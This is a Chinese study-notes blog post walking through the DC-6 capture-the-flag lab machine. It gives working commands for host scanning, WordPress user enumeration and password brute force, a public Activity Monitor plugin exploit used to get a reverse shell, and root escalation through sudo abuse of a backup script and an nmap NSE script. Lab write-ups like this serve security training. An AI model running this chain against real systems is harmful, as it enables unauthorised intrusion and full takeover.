[网络安全学习篇74]：渗透测试实战-DC-6-靶机入侵

引言：我的系列博客[网络安全学习篇]上线了，小编也是初次创作博客，经验不足；对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙，其实看到目录有300多集的时候，讲道理，有点怂了，所以我就想到了通过写博客（课程笔记）的形式去学习它，虽然写博客会让我多花几倍的时间去学习它，但是当我完成一篇博客所获得的成就感和你们对于我的认同感，让我很满足，能够鼓励我一天天的坚持下去，也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白，大部分知识点都是初次接触，出现对其理解不深入，不完整，甚至也会出现错误有问题的地方，希望大家谅解、留言提出指正，同时也欢迎大家来找我一起交流学习！！！

 

往期博客：

第一阶段：

[网络安全学习篇1]：windowsxp、windows2003、windows7、windows2008系统部署（千峰网络安全视频笔记）

[网络安全学习篇24]：漏洞与木马（千峰网络安全视频笔记 p117-p118）

第二阶段：

[网络安全学习篇25]：初识Linux及简单命令

[网络安全学习篇32]：Linux脚本编写汇总及应用

第三阶段：

[网络安全学习篇33]：0基础带你入门python

[网络安全学习篇38]：基础环境搭建

[网络安全学习篇39]：HTML标签基础 常用的标签 表格

[网络安全学习篇42]：靶场环境搭建（ubuntu系统安装优化及vulhub安装）

[网络安全学习篇43]：PHP基础+变量 运算符 流程控制语句

[网络安全学习篇48]：JS 基础 函数 事件）

第四阶段：

[网络安全学习篇49]：渗透测试方法论

[网络安全学习篇50]：Web架构安全分析

[网络安全学习篇51]：信息收集

[网络安全学习篇52]：扫描技术

[网络安全学习篇53]：口令破解

[网络安全学习篇54]：SQL注入

[网络安全学习篇55]：SQL自动化注入

[网络安全学习篇56]：XSS

[网络安全学学习篇57]：XSS（二）

[网络安全学习篇58]：PHP代码注入

[网络安全学习篇59]：OS命令注入

[网络安全学习篇60]：文件上传

[网络安全学习篇61]：文件包含

[网络安全学习篇62]：CSRF 攻击

[网络安全学习篇63]：SSRF

[网络安全学习篇64]：业务安全

[千峰网络安全学习篇65]：提权

[网络安全学习篇66]：Metasploit(MSF)

[网络安全学习篇67]：python poc-exp

[网络安全学习篇68]：反序列化漏洞

[网络安全学习篇69]：渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]：渗透测试实战-DC-2-靶机入侵

[网络安全学习篇71]：渗透测试实战-DC-3-靶机入侵

[网络安全学习篇72]：渗透测试实战-DC-4-靶机入侵

[网络安全学习篇73]：渗透测试实战-DC-5-靶机入侵

[网络安全学习篇74]：渗透测试实战-DC-6-靶机入侵（本篇）

下期博文：

[网络安全学习篇75]：渗透测试实战-DC-7-靶机入侵

 

目录

信息收集

获取IP及目标主机信息

添加本地DNS解析

使用wpscan 扫描

爆破

创建密码字典

创建用户名字典

反弹shell

提权

成功拿到flag

---

信息收集

获取IP及目标主机信息

nmap -sP 192.168.1.2/24 -oN nmap.sP

 

nmap -A 192.168.1.169 -p- -oN  nmap.A

 

添加本地DNS解析

vim /etc/hosts

192.168.1.169 wordy

 

 

使用wpscan 扫描

wpscan --url wordy -e u

扫出了网站的登录后台

http://wordy/wp-login.php

 

以及4个用户名

爆破

作者给出了爆破使用的密码字典的提示信息，

创建密码字典

cd /usr/share/wordlists

cp rockyou.txt.gz rockyou.txt.gz.bak

gunzip rockyou.txt.gz rockyou.txt

cp /usr/share/wordlists/rockyou.txt /root/dc-6/passwd.dic

 

创建用户名字典

vim user.dic

 

暴力破解用户名密码

wpscan --url wordy -U user.dic -P passwd.dic

Username: mark, Password: helpdesk01

 

使用该账密，成功登录网站后台

反弹shell

查找activity monitor 插件是否存在漏洞

 

searchsploit activity monitor

存在远程执行漏洞可以反弹shell 到本地

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

 

修改该文件

vim 45274.html

python -m SimpleHTTPServer

当前目录下开启http 服务

 

 

本地开启nc 监听2333端口

nc -lvvp 2333

点击Submit request 连接

python -c 'import pty;pty.spawn("/bin/bash")'

反弹shell 成功，进入python 交互式

提权

进入到mark 的家目录下，在stuff 目录下发现things-to-do.txt 文件

得到graham 用户账密

 

sudo -l

可以发现 jens 用户在没有密码的情况下可以执行backups.sh　文件

我们在backups.sh 文件中添加/bin/bash 命令

echo "/bin/bash" >>backups.sh

 

sudo -u jens ./backups.sh

成功切换到jens 用户

 

sudo -l

发现nmap 命令可以在不需要root 用户密码密码的情况下使用

考虑使用nmap 脚本来提权

echo 'os.execute("/bin/sh")' > getShell.nse

sudo -u root nmap --script=getShell.nse

 

成功拿到flag